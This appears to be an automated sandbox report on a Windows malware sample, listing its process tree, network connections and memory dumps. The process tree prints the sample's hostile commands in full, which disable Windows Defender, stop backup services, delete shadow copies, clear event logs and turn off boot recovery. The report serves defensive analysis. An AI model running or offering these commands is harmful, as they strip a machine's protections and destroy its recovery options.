PID 2708 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe

"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12cc1" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12cc1" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12cc1" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.12.20:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/3996-115-0x0000000000000000-mapping.dmp

memory/804-116-0x0000000000000000-mapping.dmp

memory/852-117-0x0000000000000000-mapping.dmp

memory/1028-118-0x0000000000000000-mapping.dmp

memory/3516-119-0x0000000000000000-mapping.dmp

memory/3568-120-0x0000000000000000-mapping.dmp

memory/652-121-0x0000000000000000-mapping.dmp

memory/1588-122-0x0000000000000000-mapping.dmp

memory/3420-123-0x0000000000000000-mapping.dmp

memory/3764-124-0x0000000000000000-mapping.dmp

memory/3708-125-0x0000000000000000-mapping.dmp

memory/1724-126-0x0000000000000000-mapping.dmp

memory/1528-127-0x0000000000000000-mapping.dmp

memory/500-128-0x0000000000000000-mapping.dmp

memory/856-129-0x0000000000000000-mapping.dmp

memory/1684-130-0x0000000000000000-mapping.dmp

memory/2688-131-0x0000000000000000-mapping.dmp

memory/3148-132-0x0000000000000000-mapping.dmp

memory/3000-133-0x0000000000000000-mapping.dmp

memory/1108-134-0x0000000000000000-mapping.dmp

memory/4084-135-0x0000000000000000-mapping.dmp

memory/1160-136-0x0000000000000000-mapping.dmp

memory/1952-137-0x0000000000000000-mapping.dmp

memory/1140-138-0x0000000000000000-mapping.dmp

memory/1480-139-0x0000000000000000-mapping.dmp

memory/1616-140-0x0000000000000000-mapping.dmp

memory/3936-141-0x0000000000000000-mapping.dmp

memory/1476-142-0x0000000000000000-mapping.dmp

memory/2384-143-0x0000000000000000-mapping.dmp

memory/2008-144-0x0000000000000000-mapping.dmp

memory/3308-145-0x0000000000000000-mapping.dmp

memory/3500-146-0x0000000000000000-mapping.dmp

memory/1228-147-0x0000000000000000-mapping.dmp

memory/1352-148-0x0000000000000000-mapping.dmp

memory/2160-149-0x0000000000000000-mapping.dmp

memory/3768-150-0x0000000000000000-mapping.dmp

memory/1516-151-0x0000000000000000-mapping.dmp

memory/3828-152-0x0000000000000000-mapping.dmp

memory/2692-153-0x0000000000000000-mapping.dmp

memory/940-154-0x0000000000000000-mapping.dmp

memory/2324-155-0x0000000000000000-mapping.dmp

memory/2388-156-0x0000000000000000-mapping.dmp

memory/1464-157-0x0000000000000000-mapping.dmp

memory/3564-158-0x0000000000000000-mapping.dmp

memory/1540-159-0x0000000000000000-mapping.dmp

memory/3160-160-0x0000000000000000-mapping.dmp

memory/2892-161-0x0000000000000000-mapping.dmp

memory/1684-162-0x0000000000000000-mapping.dmp

memory/8-163-0x0000000000000000-mapping.dmp

memory/2672-164-0x0000000000000000-mapping.dmp

memory/4012-165-0x0000000000000000-mapping.dmp

memory/1192-166-0x0000000000000000-mapping.dmp

memory/2436-167-0x0000000000000000-mapping.dmp

memory/2332-168-0x0000000000000000-mapping.dmp

memory/1844-169-0x0000000000000000-mapping.dmp

memory/1504-170-0x0000000000000000-mapping.dmp

memory/2888-171-0x0000000000000000-mapping.dmp

memory/3048-172-0x0000000000000000-mapping.dmp

memory/3652-173-0x0000000000000000-mapping.dmp

memory/2128-174-0x0000000000000000-mapping.dmp

memory/2264-175-0x0000000000000000-mapping.dmp

memory/3220-176-0x0000000000000000-mapping.dmp

memory/2180-177-0x0000000000000000-mapping.dmp

memory/1284-178-0x0000000000000000-mapping.dmp

memory/3596-180-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp

memory/3596-179-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp

memory/3596-181-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp

memory/3596-182-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp

memory/3596-183-0x000001F362DF0000-0x000001F362E12000-memory.dmp

memory/3596-184-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp

memory/3596-185-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp

memory/3596-186-0x000001F363350000-0x000001F3633C6000-memory.dmp

memory/3596-187-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp

memory/3596-192-0x000001F362FD3000-0x000001F362FD5000-memory.dmp

memory/3596-191-0x000001F362FD0000-0x000001F362FD2000-memory.dmp

memory/3596-213-0x000001F362FD6000-0x000001F362FD8000-memory.dmp

memory/3596-214-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp

memory/3196-216-0x0000021738E70000-0x0000021738E72000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/3196-217-0x0000021738E70000-0x0000021738E72000-memory.dmp

memory/3196-218-0x0000021738E70000-0x0000021738E72000-memory.dmp

memory/3196-219-0x0000021738E70000-0x0000021738E72000-memory.dmp

memory/3196-220-0x00000217515F0000-0x0000021751612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4f1870a45bbf2b6f3bf8ffe55acdbebc
SHA1 7eb6ab5440957493a85b7bc71c4a91446f1e1575
SHA256 33c573e776d5f986b4b8aaedf82d6191df350adc18d1950d4fe146a5e0a76726
SHA512 6a0b1b6fe0c1f5f1a671dc59b19970825331febbca50ed611693b089277cbec0b147f4393bd0d8934fff793c936720e9aab4609c2e5f31f2a0cd0d7ca42dcfd0

memory/3196-222-0x0000021738E70000-0x0000021738E72000-memory.dmp

memory/3196-223-0x0000021738E70000-0x0000021738E72000-memory.dmp

memory/3196-224-0x0000021751B70000-0x0000021751BE6000-memory.dmp

memory/3596-225-0x000001F362FD8000-0x000001F362FD9000-memory.dmp

memory/3196-227-0x0000021751473000-0x0000021751475000-memory.dmp

memory/3196-226-0x0000021751470000-0x0000021751472000-memory.dmp

memory/3196-228-0x0000021738E70000-0x0000021738E72000-memory.dmp

memory/3196-252-0x0000021738E70000-0x0000021738E72000-memory.dmp

memory/3196-253-0x0000021751476000-0x0000021751478000-memory.dmp

memory/3196-254-0x0000021751478000-0x0000021751479000-memory.dmp